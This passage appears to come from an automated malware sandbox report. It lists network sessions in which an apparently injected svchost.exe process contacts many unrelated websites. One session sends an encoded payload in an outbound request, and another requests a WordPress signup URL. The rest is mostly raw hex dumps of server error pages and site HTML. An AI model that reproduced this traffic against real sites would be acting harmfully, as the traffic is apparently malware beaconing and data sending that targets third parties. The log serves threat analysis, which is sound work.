                                                                                                                                                                                                                                                                        Data Ascii: pYCH6a21uLq8vsHDxcjKzM/R09WR2oKL6NW/F6j/P8vImLC2valZZtWCkJ0quHNfPXiwwTe/wbo8GFhUAmCQ3MCaiBjxezRLZScY8GWmzAZ2LKuEQ0uLD5/qvMdVjw7Tb47pLpnlW1u7MtxBiSb4JUhAZYromneT5w3QixvKCJ7NyP2sZkG3pl2yF08uCfrLLclzTcDww1i2tZYL1NCMELAaqMomtVe4GsPHkcCPMKbJsfO45vD3d8gQLy63aJa


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        83192.168.2.65699449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1316OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net
                                                                                                                                                                                                                                                                        Content-Length: 4428
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1316OUTData Raw: 61 5a 49 73 4f 54 39 4a 54 56 42 54 56 31 70 64 59 47 4e 6d 61 6d 31 77 63 33 65 77 76 58 73 65 62 78 4a 4a 54 62 39 2b 58 34 72 72 4f 31 31 72 4b 77 4e 6b 6d 65 6c 74 45 39 57 7a 31 51 36 65 4d 55 35 41 69 57 79 64 48 46 7a 41 66 62 71 68 5a 32 61 57 36 45 78 73 56 43 6d 32 79 4b 6a 47 68 36 79 58 53 4b 42 6f 34 75 6f 4e 6b 7a 53 69 49 58 4b 6c 35 68 59 63 44 48 64 52 76 63 71 6f 61 78 45 6c 6b 64 69 73 4b 55 4d 4f 34 4b 66 31 72 48 5a 71 51 4e 54 51 2f 77 33 53 61 48 65 4e 72 59 52 46 56 47 38 63 55 54 64 6a 2b 6d 6c 79 6a 74 56 63 75 6c 42 37 45 42 57 64 56 6b 69 34 55 76 37 32 53 4b 4e 42 47 77 7a 2f 78 34 75 53 6e 2b 38 6e 4b 4d 50 6c 2b 74 74 52 45 53 77 53 54 34 54 72 45 4c 69 42 59 4d 71 4f 38 58 6f 46 48 6e 4f 51 6a 59 70 69 71 39 6c 4a 4e 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: aZIsOT9JTVBTV1pdYGNmam1wc3ewvXsebxJJTb9+X4rrO11rKwNkmeltE9Wz1Q6eMU5AiWydHFzAfbqhZ2aW6ExsVCm2yKjGh6yXSKBo4uoNkzSiIXKl5hYcDHdRvcqoaxElkdisKUMO4Kf1rHZqQNTQ/w3SaHeNrYRFVG8cUTdj+mlyjtVculB7EBWdVki4Uv72SKNBGwz/x4uSn+8nKMPl+ttRESwST4TrELiBYMqO8XoFHnOQjYpiq9lJNon


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        84192.168.2.657044185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1321OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1321INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1321INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        85192.168.2.657146138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1322OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1322INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1322INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        86192.168.2.657241172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1322OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1376INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:24 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:24 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XNJObqE%2F13U1eEQY2Gd0P90pP5YOUmOIV%2BV81cJNJQDJ2SUbEzu72KWO9iz3VasmkfVceJF4uaZDRL5jPs%2FodELkWkRKONpwLl3oo2ivxCcUKjd3VF4%2F9GHJRGgseFsh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a83fda262c18-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1377INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1377INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        87192.168.2.657274138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1323OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1323INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1323INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        88192.168.2.657271138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1323OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1323INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1324INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        89192.168.2.657387138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1373OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1373INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1373INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        9192.168.2.65052783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC148OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=99
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC429INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC432INData Raw: 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e
                                                                                                                                                                                                                                                                        Data Ascii: }return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC473INData Raw: 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72
                                                                                                                                                                                                                                                                        Data Ascii: 4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC481INData Raw: 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73
                                                                                                                                                                                                                                                                        Data Ascii: h":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revs
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC489INData Raw: 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="16x16"/><link rel="icon" href="https://dataform.co.uk/wp-co
